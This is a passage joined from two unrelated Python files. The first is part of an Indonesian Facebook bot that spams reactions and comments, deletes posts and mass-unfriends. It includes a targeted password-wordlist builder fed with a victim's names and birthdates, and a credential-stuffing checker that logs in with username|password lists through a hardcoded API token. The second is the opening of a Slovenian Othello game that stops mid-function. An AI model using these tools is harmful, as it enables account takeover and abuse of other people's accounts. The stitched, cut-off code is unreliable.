ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
othello.py | from tkinter import *
import threading
from alphabeta import Alphabeta
POS_INFINITY = 100000000000
NEG_INFINITY = -POS_INFINITY
BELI = "Beli"
CRNI = "Črni"
CLOVEK = "človek"
RACUNALNIK = "računalnik"
navodila = ["Othello ali reversi je strateška igra na igralni deski z 8 × 8 polji za dva igralca. ",
"Igralca potrebujeta za igro črne in bele figure.\n\n", "Pravila igre:\n\n",
"Na začetku ima vsak izmed igralcev na plošči dva žetona. ", "Igralca nato izmenično polagata žetone na ploščo. ",
"Pri vsaki potezi mora biti žeton postavljen poleg nasprotnikovega žetona (lahko vodoravno, navpično ali diagonalno). ",
"Položeni žeton mora v vsaki potezi ujeti enega ali več nasprotnikovih žetonov med dva svoja žetona. ",
"Nasprotnikove žetone lahko ujame v katerikoli smeri od pravkar položenega (t.j. vodoravno, navpično ali diagonalno). ",
"Ujetim nasprotnikovim žetonom igralec tako spremeni barvo. ",
"Če igralec, ki pride na potezo, ne more storiti ničesar (t.j. ne more ujeti nasprotnikovih žetonov med dva svoja), ",
"mora prepustiti potezo nasprotniku. " "Igralca nadaljujeta s postopkom igranja, dokler ne zapolnita vseh polj, ",
"ali dokler se ne zgodi, da nobeden izmed njiju ne more narediti veljavne poteze. ",
"Igralec, ki ima ob koncu igre na plošči največ žetonov svoje barve, zmaga.\n\n",
"Za pomoč so v aplikaciji polja, kamor je možno postaviti žeton, označena z zeleno piko.\n\n",
"Namig:\n\n", "Žetona, ki je postavljen v kot igralne deske, nasprotni igralec ne more ujeti oz. mu spremeniti barvo.",
"Zato je priporočljivo zasesti čimveč kotov.", " Dobre so tudi pozicije ob robovih."]
#seznam z vrednostmi polj, ki se uporablja pri hevristiki
HEVRISTIKA = [[20, -3, 11, 8, 8, 11, -3, 20],
[-3, -7, -4, 1, 1, -4, -7, -3],
[11, -4, 2, 2, 2, 2, -4, 11],
[8, 1, 2, 1, 1, 2, 1, 8],
[8, 1, 2, 1, 1, 2, 1, 8],
[11, -4, 2, 2, 2, 2, -4, 11],
[-3, -7, -4, 1, 1, -4, -7, -3],
[20, -5, 11, 8, 8, 11, -3, 20]]
def drugi(igr):
if igr == CRNI:
return BELI
else:
return CRNI
def veljavna(barva, di, dj, polje, i, j):
"""Če je poteza v smeri (di,dj) na polju (i,j) veljavna, vrne True, sicer vrne False"""
#parametra di in dj predstavljata spremembo koordinate i in koordinate j
#npr. če je di==1 in dj==1, se pomikamo po diagonali proti desnemu spodnjemu
#robu plošče in preverjamo, ali je v tej smeri poteza veljavna
k = 1
while (0 <= i + k * di <= 7) and (0 <= j + k * dj <= 7) and polje[i+k*di][j+k*dj] == drugi(barva):
k += 1
if (0 <= i +k * di <= 7) and (0 <= j + k * dj <= 7):
return polje[i+k*di][j+k*dj] == barva and k>1
else:
return False
def seznam_sosedov(i, j) :
"""Vrne seznam sosedov polja s koordinatami (i,j)"""
if i == 0:
if j == 0:
return [[i+1,j],[i+1,j+1],[i,j+1]]
elif j == 7:
return [[i+1,j],[i+1,j-1],[i,j-1]]
else:
return [[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1]]
elif i == 7:
if j == 0:
return [[i-1,j],[i-1,j+1],[i,j+1]]
elif j == 7:
return [[i-1,j],[i-1,j-1],[i,j-1]]
else:
return [[i,j-1],[i-1,j-1],[i-1,j],[i-1,j+1],[i,j+1]]
else:
if j == 0:
return [[i-1,j],[i-1,j+1],[i,j+1],[i+1,j+1],[i+1,j]]
elif j == 7:
return [[i-1,j],[i-1,j-1],[i,j-1],[i+1,j-1],[i+1,j]]
else:
return [[i-1, j],[i+1, j],[i-1,j+1],[i,j+1],[i+1,j+1],[i-1,j-1],[i,j-1],[i+1,j-1]]
class Igra():
"""Razred, ki predstavlja trenutno stanje igre."""
def __init__(self):
self.na_potezi = CRNI # kdo je na potezi
#število črnih/belih ploščic, ki so na polju
self.stejcrne = 2
self.stejbele = 2
#obtežena vrednost črnih/belih ploščic - preračunana glede na hevristiko
self.vrednost_crnih = 2
self.vrednost_belih = 2
self.crni = CLOVEK #kdo je črni
self.beli = CLOVEK #kdo je beli
#slovar, ki barvi igralca priredi njegov status (torej ali je beli/črni računalnik ali človek)
self.slovar = {CRNI:self.crni, BELI:self.beli}
self.pass_poteze = 0 #šteje situacije, ko igralec ni mogel povleči veljavne poteze
#seznam, ki vsebuje elemente "None" (prazno polje), CRNI in BELI
self.polje = [[None for i in range(8)] for j in range(8)]
#začetne žetone doda v self.polje
self.polje[3][3] = CRNI
self.polje[4][4] = CRNI
self.polje[3][4] = BELI
self.polje[4][3] = BELI
self.prejsnja_stanja = [] #prejšnja stanja igre
#seznam je oblike [na_potezi, stejcrne, stejbele, vrednost_crnih, vrednost_belih, polje, pass_poteze]
def konec(self):
'''Ugotovi, ali je konec igre. Vrne None (igre ni konec),
niz 'Neodločeno' (rezultat je neodločen), ali pa zmagovalca.'''
if self.poteze(CRNI)== self.poteze(BELI)==["pass"] or self.pass_poteze >= 2 or self.stejbele+self.stejcrne == 64:
if self.stejcrne > self.stejbele:
return CRNI
elif self.stejbele > self.stejcrne:
return BELI
else:
return "Neodločeno"
else:
return None
def vrednost(self):
"""Ocena za trenutno vrednost igre. Če je igre konec, mora biti ta ocena natančna,
sicer je to nek približek."""
#Na koncu vrne natančno oceno: razliko v številu črnih in belih polj.
if self.konec()!= None:
if self.na_potezi == CRNI:
return (self.stejcrne - self.stejbele)
else:
return (self.stejbele - self.stejcrne)
